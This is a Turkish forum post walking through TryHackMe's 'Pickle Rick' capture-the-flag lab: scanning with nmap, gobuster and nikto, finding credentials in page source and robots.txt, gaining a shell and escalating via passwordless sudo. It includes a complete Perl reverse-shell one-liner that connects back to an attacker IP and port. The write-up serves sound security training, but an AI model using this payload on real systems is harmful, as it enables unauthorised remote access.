THM Pickle Rick CTF WriteUp

The Gölge

Katılımcı Üye
Selamın aleyküm dostlar bu konumda TryHackMe de bulunan Pickle Rick adlı CTF Çözeceğiz. İlgisi olanlar için faydalı olması dileğiyle.

CTF
Seviye: Kolay


1. Reconnaissance(Bilgi Toplama)

CTFler de her zaman olduğu gibi işe nmap taraması yapmakla başlıyoruz.
Kod:
nmap -A -v İP

3ack14.PNG


Gördüğünüz üzere dostlar 2 adet portumuz açık bunlar 22(ssh) , 80 (http) portları.
80 Portu açık olduğu için önce bir web sitesine bakalım.​

is859w.PNG


Sitede bize bir seneryo anlatılıyor.Kendisinin bir turşu olduğunun ve geri dönmek için gereken iksir formullerinin bilgisayarında kayıtlı olduğu yazıyor.
Sayfa kaynağını inceliyelim.​

ln371e.PNG


Bize sayfa kaynağında username bilgisini vermiş bunu bir yere kaydettik.
CTFler için olmazsa olmazlarında biri de robots.txt'dir sayfanın robots.txt'sine bakalım.​

sezseu.PNG


Sayfada bize bir şey vermiş bu aradığımız parola olabilir bunu da kaydettik.
Şimdi ise gobuster ile dizin taraması yapalım.​

Kod:
gobuster dir -u URL -w WORDLİST
[/CENTER]

nlyef7.PNG


Dizin taramasından önemli bir şey çıkmadı.Bir de nikto ile tarama yapalım.​

esovr8.PNG


Site de login.php varmış hemen bakalım.

sj34fr.png


Evet karşımıza bir giriş yeri çıktı. Başta bulduğumuz kullanıcı adı ve robots.txt den çıkan yazıyı girmeye çalışalım girebilecek miyiz.​

jcc578.PNG


d1auhf.PNG


Başarı ile giriş yaptık panele dostlar ve bizi bir adet command panel karşıladı. Komut çalıştırmayı deneyelim.​

r2swb5.PNG


2. Sisteme Giriş(Reverse Shell)​

Demek ki komut çalıştırabiliyormuşuz. Şimdi de reverse shell deneyelim.​
Perl kullanarak bir reverse shell deniyoruz.​

Reverse Shell:
Kod:
perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Öncelikle nc aracından 1234 portunu dinlemeye alıyoruz ardından reverse shell kodunu command panel'e giriyoruz.​

53h9jz.PNG


parsau.PNG


e5v0ce.PNG


Bağlantıyı sağladık.Şimdi ise bizden istenilen birinci dosyayı okuyalım.​

kwhr0c.PNG


İçeride clue.txt adlı bir dosya var onu da okuyalım.​

lf4xq1.PNG


Bize ikinci istenilenin, diğer dosyalar içerisinde olduğunu söylüyor.​
Hemen en basitinden home klasörüne bakalım bulabilecekmiyiz.​

g2vwkm.PNG


Rick klasörünün içine giriyoruz bakalım içerisinde ne var.​

atuy36.PNG


3. Yetki Yükseltme

Evet aradığımız ikinci şeyi de bulduk şimdi en son kısıma geldik bizden root olmamız istiyor üçüncü bileşeni elde etmek için.

qc40dk.PNG


Sudo -l yaptık ve Password kullanmadan sudo çalıştırabileceğimizi söylüyor.
Şimdi sudo su ile root olalım.

88cnti.PNG


Root olmayı başardık. Şimdi cd / ile kök dizine gidelim.

mwieyg.PNG


Evet son gereken bileşeni de root klasöründe bulduk.

it255n.PNG


Evet dostlar bu ctf konum bu kadardı size bir kaç bir şey katabildiysem ne mutlu bana.Okuduğunuz için teşekkür ederim. Herkese hayırlı günler.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.